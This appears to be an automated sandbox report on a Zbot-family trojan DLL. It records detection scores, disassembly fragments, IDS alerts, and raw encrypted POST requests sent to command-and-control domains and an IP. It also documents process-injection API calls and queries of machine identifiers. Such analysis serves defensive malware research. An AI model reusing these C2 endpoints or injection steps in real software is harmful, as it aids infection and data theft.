Source: http://wingtonwelbemdon.com/web/post.php | Avira URL Cloud: Label: malware |
Source: http://wingtonwelbemdon.com/web/post.php | Virustotal: Detection: 6% |
Source: cXQT5g.dll | Virustotal: Detection: 10% |
Source: C:\Users\user\AppData\Roaming\Omne\fapud.dll | Joe Sandbox ML: detected |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014DF70 FindFirstFileW,FindNextFileW, | 18_2_0014DF70 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, esi | 1_2_6E499AE0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 1_2_6E4A7F10 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 1_2_6E4A5F30 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 1_2_6E4A8FA0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then test di, di | 1_2_6E4A6C60 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov ecx, dword ptr [6E4B2090h+eax*4] | 1_2_6E4A4C00 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 1_2_6E4A70F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 1_2_6E4A1D00 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 1_2_6E4A9530 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 1_2_6E4AB1B0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, esi | 18_2_00149AE0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov ecx, dword ptr [00162090h+eax*4] | 18_2_00154C00 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then test di, di | 18_2_00156C60 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 18_2_001570F0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 18_2_00151D00 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 18_2_00159530 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 18_2_0015B1B0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 18_2_00157F10 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 18_2_00155F30 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 18_2_00158FA0 |
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49739 -> 91.203.192.40:80 |
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49740 -> 91.203.192.40:80 |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: donburitimesofindia.comContent-Length: 285Connection: CloseCache-Control: no-cacheData Raw: fa 09 a1 8f bf 84 28 1c b7 ee e8 94 0d 9a 89 22 72 8f 0b 43 df 1c dc b5 f5 3d 88 d0 13 98 c2 2e 8d 56 4c 02 ba dc 12 2e 22 c0 83 f6 a6 75 7a 4c a7 20 5b 33 03 33 b9 fb 0d 80 79 ff 30 07 4f e2 37 db 9d d5 22 45 b3 36 a5 46 fc 60 62 46 67 75 c4 98 76 9e 15 dd 72 7b d1 b5 99 b5 b3 89 a5 4a 01 fb 23 ed aa e8 73 f7 6e a3 e3 e7 ff 3a c3 e4 7c 3e 29 f7 d5 f0 47 17 a6 9d a0 04 95 d1 ca 0b 02 d7 50 16 43 0c b9 b4 ec 73 85 80 09 e4 c6 7c 17 f4 e9 f1 ea 37 12 f6 ae e0 0f 14 a9 e8 b0 2b 14 0e df 1f 63 6a 69 30 67 5b 70 29 e8 e4 85 b1 13 13 ef c6 a2 d6 59 08 4d fa 2a 61 cc ad 2b 85 8b 25 81 94 fb 01 11 98 22 ed d2 17 52 d7 16 39 f5 3f db bb 9a 48 8a 89 e0 50 a6 73 88 32 6a f5 af a5 35 93 52 2b 2f ae aa 7f 08 d8 1a f4 72 1f 9f f1 17 e4 df eb 6e dd 0b f0 bc 49 36 90 80 87 99 6b 34 0e 56 77 94 1e c2 ea 6c 24 4e 58 91 d2 46 d3 ee 1f b2 b3 b3 68 a3 14 14 b9 f7 Data Ascii: ("rC=.VL."uzL [33y0O7"E6F`bFguvr{J#sn:|>)GPCs|7+cji0g[p)YM*a+%"R9?HPs2j5R+/rnI6k4Vwl$NXFh |
Source: Joe Sandbox View | ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00152C60 InternetReadFile, | 18_2_00152C60 |
Source: unknown | DNS traffic detected: queries for: wingtonwelbemdon.com |
Source: unknown | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r |
Source: C:\Windows\System32\loaddll32.exe | Process Stats: CPU usage > 98% |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC9D0 | 1_2_6E4AC9D0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F410 | 18_2_0015F410 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F4BC | 18_2_0015F4BC |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015C9D0 | 18_2_0015C9D0 |
Source: cXQT5g.dll | Binary or memory string: OriginalFilenameCaptain.dllD vs cXQT5g.dll |
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll |
Source: cXQT5g.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: fapud.dll.18.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: classification engine | Classification label: mal92.troj.evad.winDLL@3/2@3/1 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49FDC0 LookupPrivilegeValueW,AdjustTokenPrivileges, | 1_2_6E49FDC0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00143B10 AdjustTokenPrivileges,FindCloseChangeNotification, | 18_2_00143B10 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E498EB0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW, | 1_2_6E498EB0 |
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9AD2E113-FD6E-1193-7CD4-CAAB82FC3C29} |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BAAAD113-CD6E-31EB-7CD4-CAAB82FC3C29} |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0A43D38F-CFF2-8102-7CD4-CAAB82FC3C29} |
Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\Temp\tmp.txt |
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: cXQT5g.dll | Virustotal: Detection: 10% |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll' |
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: cXQT5g.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: d:\62\10\Six\Need\shoe\85\48\Name\23\43\Felt\Our\Captain.pdb source: loaddll32.exe, 00000001.00000002.459411505.000000006E51D000.00000002.00020000.sdmp, msiexec.exe, 00000012.00000003.464541289.0000000004400000.00000004.00000001.sdmp, cXQT5g.dll |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: initial sample | Static PE information: 0x6173D010 [Sat Oct 23 09:04:16 2021 UTC] |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress, | 1_2_6E4A70F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B5E7D push ebx; iretd | 1_2_6E4B5E83 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B727C push ebx; retf | 1_2_6E4B72EB |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7038 push dword ptr [ebp-773E11F7h]; ret | 1_2_6E4B705D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6EE2 pushfd ; retf | 1_2_6E4B6F4F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B72A3 push ebx; retf | 1_2_6E4B72EB |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B4B push eax; iretd | 1_2_6E4B7B7F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6F44 pushfd ; retf | 1_2_6E4B6F4F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B67 push eax; iretd | 1_2_6E4B7B7F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4BA170 push esp; retf | 1_2_6E4BA186 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B75A4 push edi; iretd | 1_2_6E4B75A5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5359D5 push esi; ret | 1_2_6E5359DE |
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne\fapud.dll |
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Omne\fapud.dll |
Source: C:\Windows\SysWOW64\msiexec.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_18-14445 |
Source: C:\Windows\System32\loaddll32.exe TID: 6524 | Thread sleep count: 294 > 30 |
Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49F390 mov eax, dword ptr fs:[00000030h] | 1_2_6E49F390 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533EB5 mov eax, dword ptr fs:[00000030h] | 1_2_6E533EB5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5339F3 push dword ptr fs:[00000030h] | 1_2_6E5339F3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533DEB mov eax, dword ptr fs:[00000030h] | 1_2_6E533DEB |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014F390 mov eax, dword ptr fs:[00000030h] | 18_2_0014F390 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC590 GetProcessHeap,HeapAlloc,GetTempPathW,GetFileAttributesW,DeleteFileW,HeapFree, | 1_2_6E4AC590 |
Source: C:\Windows\System32\loaddll32.exe | Process token adjusted: Debug |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49B100 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess, | 1_2_6E49B100 |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId |
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |